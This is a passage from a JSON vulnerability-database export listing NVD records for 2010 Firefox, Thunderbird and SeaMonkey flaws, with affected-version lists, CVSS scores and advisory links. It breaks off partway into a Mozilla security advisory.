"cpe:/a:mozilla:firefox:3.5.10", "cpe:/a:mozilla:firefox:3.6.6", "cpe:/a:mozilla:seamonkey:1.1.19", "cpe:/a:mozilla:firefox:2.0.0.19", "cpe:/a:mozilla:firefox:3.0.17", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:firefox:2.0.0.4", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2010-3177", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3177", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-09-19T13:37:04", "references": ["http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefox", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html", "http://www.redhat.com/support/errata/RHSA-2010-0861.html", "http://www.securityfocus.com/bid/44252", "http://www.ubuntu.com/usn/USN-997-1", "http://www.redhat.com/support/errata/RHSA-2010-0896.html", "http://www.ubuntu.com/usn/USN-998-1", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:210", "http://www.mozilla.org/security/announce/2010/mfsa2010-69.html", "http://www.debian.org/security/2010/dsa-2124", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=576616", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:211", "http://support.avaya.com/css/P8/documents/100120156", "http://www.vupen.com/english/advisories/2011/0061", "http://www.redhat.com/support/errata/RHSA-2010-0782.html"], "description": "Mozilla Firefox before 3.5.14 and 3.6.x before 3.6.11, Thunderbird before 3.0.9 and 3.1.x before 3.1.5, and SeaMonkey before 2.0.9 do not properly handle certain modal calls made by javascript: URLs in circumstances related to opening a new window and performing cross-domain navigation, which allows remote attackers to bypass the Same Origin Policy via a crafted HTML document.", "edition": 2, "reporter": "NVD", "published": "2010-10-21T15:00:03", "title": "CVE-2010-3178", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:04", "vector": "NONE", "value": 4.3}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12120", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12120"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3178"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12120", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:12120"}], "modified": "2017-09-18T21:31:16", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.9", "cpe:/a:mozilla:thunderbird:1.5.0.10", "cpe:/a:mozilla:thunderbird:3.0.6", "cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:thunderbird:3.0.2", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.3", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:thunderbird:2.0.0.9", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:firefox:3.5.12", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:firefox:2.0.0.18", "cpe:/a:mozilla:firefox:2.0.0.8", "cpe:/a:mozilla:thunderbird:0.7", "cpe:/a:mozilla:thunderbird:3.0", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:thunderbird:1.5:beta2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:seamonkey:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.1.18", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:thunderbird:2.0.0.21", "cpe:/a:mozilla:seamonkey:1.1:beta", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:seamonkey:1.5.0.9", "cpe:/a:mozilla:firefox:2.0.0.3", "cpe:/a:mozilla:thunderbird:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.2", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:3.6.7", "cpe:/a:mozilla:firefox:3.6.2", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:3.5.13", "cpe:/a:mozilla:thunderbird:3.0.7", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:firefox:3.6.4", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:thunderbird:1.0.4", "cpe:/a:mozilla:thunderbird:2.0.0.22", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:thunderbird:2.0.0.12", "cpe:/a:mozilla:thunderbird:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:thunderbird:1.5.0.4", "cpe:/a:mozilla:firefox:1.0:preview_release", "cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:2.0.0.20", "cpe:/a:mozilla:thunderbird:3.1", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:thunderbird:1.5.0.6", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:thunderbird:1.0", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:thunderbird:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:thunderbird:1.5.2", "cpe:/a:mozilla:firefox:3.6", "cpe:/a:mozilla:thunderbird:3.1.3", "cpe:/a:mozilla:thunderbird:1.5.0.1", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:thunderbird:3.0.3", "cpe:/a:mozilla:thunderbird:0.4", "cpe:/a:mozilla:firefox:2.0.0.7", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:thunderbird:2.0.0.23", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:seamonkey:1.1:alpha", "cpe:/a:mozilla:thunderbird:0.7.2", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:firefox:3.6.8", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:thunderbird:2.0.0.19", "cpe:/a:mozilla:thunderbird:3.0.8", "cpe:/a:mozilla:thunderbird:0.6", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:firefox:3.6.3", "cpe:/a:mozilla:thunderbird:2.0.0.7", "cpe:/a:mozilla:thunderbird:3.1.1", "cpe:/a:mozilla:firefox:3.6.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:thunderbird:3.1.2", "cpe:/a:mozilla:thunderbird:2.0.0.2", "cpe:/a:mozilla:thunderbird:1.5.0.13", "cpe:/a:mozilla:thunderbird:0.8", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:thunderbird:2.0.0.5", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:firefox:3.0.16", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:0.7.1", "cpe:/a:mozilla:seamonkey:1.0:alpha", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.12", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.3", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:seamonkey:2.0:alpha_1", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:thunderbird:3.0.4", "cpe:/a:mozilla:thunderbird:0.7.3", "cpe:/a:mozilla:firefox:1.5.0.11", "cpe:/a:mozilla:thunderbird:1.0.5", "cpe:/a:mozilla:thunderbird:1.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:thunderbird:2.0", "cpe:/a:mozilla:firefox:2.0.0.6", "cpe:/a:mozilla:thunderbird:2.0.0.1", "cpe:/a:mozilla:firefox:2.0.0.5", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:thunderbird:1.5.0.14", "cpe:/a:mozilla:thunderbird:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:firefox:3.5.8", "cpe:/a:mozilla:seamonkey:1.5.0.8", "cpe:/a:mozilla:thunderbird:2.0.0.0", "cpe:/a:mozilla:thunderbird:3.0.5", "cpe:/a:mozilla:firefox:3.0.15", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:thunderbird:3.1.4", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:firefox:3.5.11", "cpe:/a:mozilla:thunderbird:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.0.2", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:thunderbird:0.5", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:thunderbird:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:thunderbird:1.5.1", "cpe:/a:mozilla:firefox:3.5.9", "cpe:/a:mozilla:firefox:3.6.10", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:thunderbird:1.0.7", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:firefox:2.0.0.16", "cpe:/a:mozilla:thunderbird:0.2", "cpe:/a:mozilla:thunderbird:1.5.0.5", "cpe:/a:mozilla:firefox:3.5.10", "cpe:/a:mozilla:firefox:3.6.6", "cpe:/a:mozilla:seamonkey:1.1.19", "cpe:/a:mozilla:thunderbird:2.0.0.16", "cpe:/a:mozilla:firefox:2.0.0.19", "cpe:/a:mozilla:firefox:3.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.11", "cpe:/a:mozilla:thunderbird:0.1", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:thunderbird:2.0.0.14", "cpe:/a:mozilla:firefox:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.7", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:thunderbird:0.9", "cpe:/a:mozilla:thunderbird:2.0.0.8", "cpe:/a:mozilla:thunderbird:1.0.3", "cpe:/a:mozilla:thunderbird:2.0.0.18", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:thunderbird:0.3", "cpe:/a:mozilla:thunderbird:2.0.0.6", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2010-3178", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3178", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-09-19T13:37:04", "references": ["http://www.mozilla.org/security/announce/2010/mfsa2010-67.html", "http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefox", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html", "http://www.redhat.com/support/errata/RHSA-2010-0861.html", "http://www.zerodayinitiative.com/advisories/ZDI-10-219/", "http://www.securityfocus.com/bid/44249", "http://www.ubuntu.com/usn/USN-997-1", "http://www.redhat.com/support/errata/RHSA-2010-0896.html", "http://www.ubuntu.com/usn/USN-998-1", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:210", "http://www.debian.org/security/2010/dsa-2124", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=598669", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:211", "http://support.avaya.com/css/P8/documents/100120156", "http://www.vupen.com/english/advisories/2011/0061", "http://www.redhat.com/support/errata/RHSA-2010-0782.html"], "description": "The LookupGetterOrSetter function in js3250.dll in Mozilla Firefox before 3.5.14 and 3.6.x before 3.6.11, Thunderbird before 3.0.9 and 3.1.x before 3.1.5, and SeaMonkey before 2.0.9 does not properly support window.__lookupGetter__ function calls that lack arguments, which allows remote attackers to execute arbitrary code or cause a denial of service (incorrect pointer dereference and application crash) via vectors involving a \"dangling pointer\" and the JS_ValueToId function.", "edition": 2, "reporter": "NVD", "published": "2010-10-21T15:00:03", "title": "CVE-2010-3183", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:04", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11891", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11891"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3183"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11891", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:11891"}], "modified": "2017-09-18T21:31:17", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.9", "cpe:/a:mozilla:thunderbird:1.5.0.10", "cpe:/a:mozilla:thunderbird:3.0.6", "cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:thunderbird:3.0.2", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.3", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:thunderbird:2.0.0.9", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:firefox:3.5.12", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:firefox:2.0.0.18", "cpe:/a:mozilla:firefox:2.0.0.8", "cpe:/a:mozilla:thunderbird:0.7", "cpe:/a:mozilla:thunderbird:3.0", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:thunderbird:1.5:beta2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:seamonkey:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.1.18", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:thunderbird:2.0.0.21", "cpe:/a:mozilla:seamonkey:1.1:beta", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:seamonkey:1.5.0.9", "cpe:/a:mozilla:firefox:2.0.0.3", "cpe:/a:mozilla:thunderbird:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.2", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:3.6.7", "cpe:/a:mozilla:firefox:3.6.2", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:3.5.13", "cpe:/a:mozilla:thunderbird:3.0.7", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:firefox:3.6.4", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:thunderbird:1.0.4", "cpe:/a:mozilla:thunderbird:2.0.0.22", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:thunderbird:2.0.0.12", "cpe:/a:mozilla:thunderbird:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:thunderbird:1.5.0.4", "cpe:/a:mozilla:firefox:1.0:preview_release", "cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:2.0.0.20", "cpe:/a:mozilla:thunderbird:3.1", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:thunderbird:1.5.0.6", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:thunderbird:1.0", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:thunderbird:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:thunderbird:1.5.2", "cpe:/a:mozilla:firefox:3.6", "cpe:/a:mozilla:thunderbird:3.1.3", "cpe:/a:mozilla:thunderbird:1.5.0.1", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:thunderbird:3.0.3", "cpe:/a:mozilla:thunderbird:0.4", "cpe:/a:mozilla:firefox:2.0.0.7", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:thunderbird:2.0.0.23", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:seamonkey:1.1:alpha", "cpe:/a:mozilla:thunderbird:0.7.2", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:firefox:3.6.8", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:thunderbird:2.0.0.19", "cpe:/a:mozilla:thunderbird:3.0.8", "cpe:/a:mozilla:thunderbird:0.6", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:firefox:3.6.3", "cpe:/a:mozilla:thunderbird:2.0.0.7", "cpe:/a:mozilla:thunderbird:3.1.1", "cpe:/a:mozilla:firefox:3.6.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:thunderbird:3.1.2", "cpe:/a:mozilla:thunderbird:2.0.0.2", "cpe:/a:mozilla:thunderbird:1.5.0.13", "cpe:/a:mozilla:thunderbird:0.8", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:thunderbird:2.0.0.5", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:firefox:3.0.16", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:0.7.1", "cpe:/a:mozilla:seamonkey:1.0:alpha", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.12", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.3", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:seamonkey:2.0:alpha_1", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:thunderbird:3.0.4", "cpe:/a:mozilla:thunderbird:0.7.3", "cpe:/a:mozilla:firefox:1.5.0.11", "cpe:/a:mozilla:thunderbird:1.0.5", "cpe:/a:mozilla:thunderbird:1.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:thunderbird:2.0", "cpe:/a:mozilla:firefox:2.0.0.6", "cpe:/a:mozilla:thunderbird:2.0.0.1", "cpe:/a:mozilla:firefox:2.0.0.5", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:thunderbird:1.5.0.14", "cpe:/a:mozilla:thunderbird:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:firefox:3.5.8", "cpe:/a:mozilla:seamonkey:1.5.0.8", "cpe:/a:mozilla:thunderbird:2.0.0.0", "cpe:/a:mozilla:thunderbird:3.0.5", "cpe:/a:mozilla:firefox:3.0.15", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:thunderbird:3.1.4", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:firefox:3.5.11", "cpe:/a:mozilla:thunderbird:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.0.2", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:thunderbird:0.5", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:thunderbird:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:thunderbird:1.5.1", "cpe:/a:mozilla:firefox:3.5.9", "cpe:/a:mozilla:firefox:3.6.10", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:thunderbird:1.0.7", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:firefox:2.0.0.16", "cpe:/a:mozilla:thunderbird:0.2", "cpe:/a:mozilla:thunderbird:1.5.0.5", "cpe:/a:mozilla:firefox:3.5.10", "cpe:/a:mozilla:firefox:3.6.6", "cpe:/a:mozilla:seamonkey:1.1.19", "cpe:/a:mozilla:thunderbird:2.0.0.16", "cpe:/a:mozilla:firefox:2.0.0.19", "cpe:/a:mozilla:firefox:3.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.11", "cpe:/a:mozilla:thunderbird:0.1", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:thunderbird:2.0.0.14", "cpe:/a:mozilla:firefox:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.7", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:thunderbird:0.9", "cpe:/a:mozilla:thunderbird:2.0.0.8", "cpe:/a:mozilla:thunderbird:1.0.3", "cpe:/a:mozilla:thunderbird:2.0.0.18", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:thunderbird:0.3", "cpe:/a:mozilla:thunderbird:2.0.0.6", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2010-3183", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3183", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:38", "references": ["https://vulners.com/securityvulns/securityvulns:doc:24957", "https://vulners.com/securityvulns/securityvulns:doc:24962", "https://vulners.com/securityvulns/securityvulns:doc:24963", "https://vulners.com/securityvulns/securityvulns:doc:24956", "https://vulners.com/securityvulns/securityvulns:doc:24961", "https://vulners.com/securityvulns/securityvulns:doc:24955", "https://vulners.com/securityvulns/securityvulns:doc:24959", "https://vulners.com/securityvulns/securityvulns:doc:24958", "https://vulners.com/securityvulns/securityvulns:doc:24960"], "description": "Multiple memory corruptions, buffer overflows, crossite scripting, TLS/SSL vulnerabilities, code execution.", "edition": 1, "reporter": "MOZILLA", "published": "2010-10-23T00:00:00", "title": "Mozilla Firefox / Thunderbird / Seamonkey / NSS multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:38", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Firefox", "version": "3.6", "operator": "eq"}, {"name": "SeaMonkey", "version": "2.0", "operator": "eq"}, {"name": "Thunderbird", "version": "3.0", "operator": "eq"}, {"name": "Thunderbird", "version": "3.1", "operator": "eq"}, {"name": "Firefox", "version": "3.5", "operator": "eq"}], "cvelist": ["CVE-2010-3177", "CVE-2010-3178", "CVE-2010-3181", "CVE-2010-3176", "CVE-2010-3174", "CVE-2010-3180", "CVE-2010-3173", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3170", "CVE-2010-3183"], "modified": "2010-10-23T00:00:00", "id": "SECURITYVULNS:VULN:11206", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11206", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "references": [], "description": "Mozilla Foundation Security Advisory 2010-64\r\n\r\nTitle: Miscellaneous memory safety hazards (rv:1.9.2.11/ 1.9.1.14)\r\nImpact: Critical\r\nAnnounced: October 19, 2010\r\nReporter: Mozilla developers and community\r\nProducts: Firefox, Thunderbird, SeaMonkey\r\n\r\nFixed in: Firefox 3.6.11\r\n Firefox 3.5.14\r\n Thunderbird 3.1.5\r\n Thunderbird 3.0.9\r\n SeaMonkey 2.0.9\r\nDescription\r\n\r\nMozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code.\r\nReferences\r\n\r\nPaul Nickerson, Jesse Ruderman, Olli Pettay, 